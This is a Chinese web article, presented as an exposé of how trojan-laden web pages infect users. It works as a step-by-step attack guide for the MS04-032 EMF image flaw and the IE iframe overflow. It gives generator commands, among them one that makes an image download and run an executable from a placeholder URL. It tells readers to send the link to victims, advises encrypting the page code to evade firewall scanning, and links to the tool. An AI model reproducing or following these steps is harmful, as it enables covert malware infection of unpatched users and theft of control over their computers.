上一篇:用HelixProducer实现局域网内现场直播 >>
“夹心”网页你敢“吃”?
各式各样的木马程序之所以会在网络上横行,网页传播是功不可没的。相对于其他传播途径,网页传播的危害面非常广泛,而ie层出不穷的漏洞也使很多朋友在不知不觉中中招。这一期的木马屠城,笔者就针对木马如何被传播出去这一问题,对最近较经典的网页木马传播方式进行剖析,让大家知道这些“夹心”网页中的木马是怎样将用户杀于无形之中的。
图形渲染漏洞
大家可曾想过浏览一个图片文件就会中木马,并且还不是以前的那种以“.jpeg”结尾的木马,因为windows又给黑客们爆出了一个更新的可利用漏洞。
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>
在windows xp sp1、windows server 2003、windows 2000 sp4中,系统对windows图像文件(wmf)和增强型图像文件(emf)图像格式进行的渲染存在一个远程代码执行漏洞,它使得恶意攻击者可以在受影响的系统上执行远程代码。漏洞的利用十分简单,我们只需要使用ms04-032溢出程序即可生成带溢出效果的emf图片。
进入命令提示符窗口,输入格式为“ms04-32.exe ”的命令。
提示:溢出方式可分为“1-端口方式溢出”和“2-下载溢出”。
例如输入“ms04-32 1.emf 1 21”,这样就生成了一个可以打开21端口的emf图片。
提示:输入“ms04-32 test.emf 2 http://www.xxx.xxx/xxx.exe”,就生成了一个可以自动在http://www.xxx.xxx/xxx.exe下载并自动运行xxx.exe这个程序的emf图片。
现在只要把此图片上传到自己的空间,然后将图片地址发给对方,没有及时更新补丁的用户看了图片后就会在不知情的情况下中招。
iframe溢出型木马
在这里笔者要给大家介绍的是如何让对方通过访问一个看似平常的网页,而不知不觉地中木马。这是网页木马传播最主要的途径,因为看似平常的网页浏览,也会带来很多严重的后果。
当iframe溢出公布后,网上就有高手针对已经公布的恶意代码进行了修改并写成了专门的木马生成器,使得它能顺利地工作在 windows 98、windows me、windows 2000、windows xp sp1(ie6)等系统下。由于它的危害很大,安装了ie6的电脑会受到iframe漏洞的影响(不包括已升级到windows xp sp2的系统)。
运行wymmpro.exe程序后,出现如图2所示的界面。首先在第一行填入已准备好的木马程序路径(网络路径),接下来在第二栏中选择ie的弹出方式和自定义生成的木马网页名。建议大家选择第一项,这样就可防止某些系统拦截所弹出的窗口。
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>
接下来在第三栏中选择默认的大内存方式(用于网页木马)。为了防止对方使用的是ie5.0/5.5而不会中招,我们可以在此生成chm木马来达到传播的目的,我们只需要把准备好的木马程序放到木马生成器的chm目录下,并根据提示填写好木马程序名和欲生成的chm文件名以及用来存放该chm的网络地址即可。
最后就是包装工作,我们可以选择对生成的网页木马代码进行压缩或加密,防止被带网页代码监控功能的防火墙拦截。现在,一个活生生的网页木马就制作好了。
软件下载地址:http://www.sixvee.com/520yy/tools/cytkk-3.rar
()
下一篇:家庭网络共享设备选购指南 >>
相关文章:
- · JSP漏洞大观
- · 安全小知识:Rundll.exe是病毒吗?
- · 为Linux操作系统安装第2个硬盘
- · 电脑优化技巧骗术揭密
- · ADSL掉线八宗罪处理方法招招应对
- · 让系统自动清除系统中的碎片
- · win2003不能网上升级解决
- · 怎样编写远程漏洞测试代码
- · SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
- · 重新编译OpenBSD内核
- · Solaris for x86在vmware4.51安装全过程
- · 还原精灵之另类破解
- · 网吧的破解非常简单
- · 计算机信息系统安全环境的五大管理要素
- · 解除安全隐患—让“命令提示符”不再危险
- · 设备冲突原理及解决
- · 终端错误信息产生原因及解决方法大全
- · 用注册表全面优化Windows
- · 智能ABC输入法的妙用
- · 红旗Linux桌面4.0最详细安装图解
- · 宽带拨号错误代码表
- · 代理服务器知识
- · 列举无法登入 FTP 服务器时的故障对照表
- · Adsl网络断流探讨及彻底解决办法
- · Photoshop CS2 新增实用功能图示
- · Windows管道技术简述
- · Java FAQ(新手必看)
- · Windows 系统之XP 应用优化指南
- · 免费刷劲乐团的装备和点券
- · 用网页报废你的硬盘
- · 黑客我不怕 Outpost防火墙应用技巧攻略
- · DIY自己动手打造Win自动更新包
- · 渗透攻击(NT/2000系统)
- · 注册表终极操作——锁定注册表
- · 轻松去掉RMVB中的自动弹出网页
- · 常用杀毒软件病毒库备份与恢复
- · 关于0Day命名
- · 【4月24日】 注册、破解软件更新
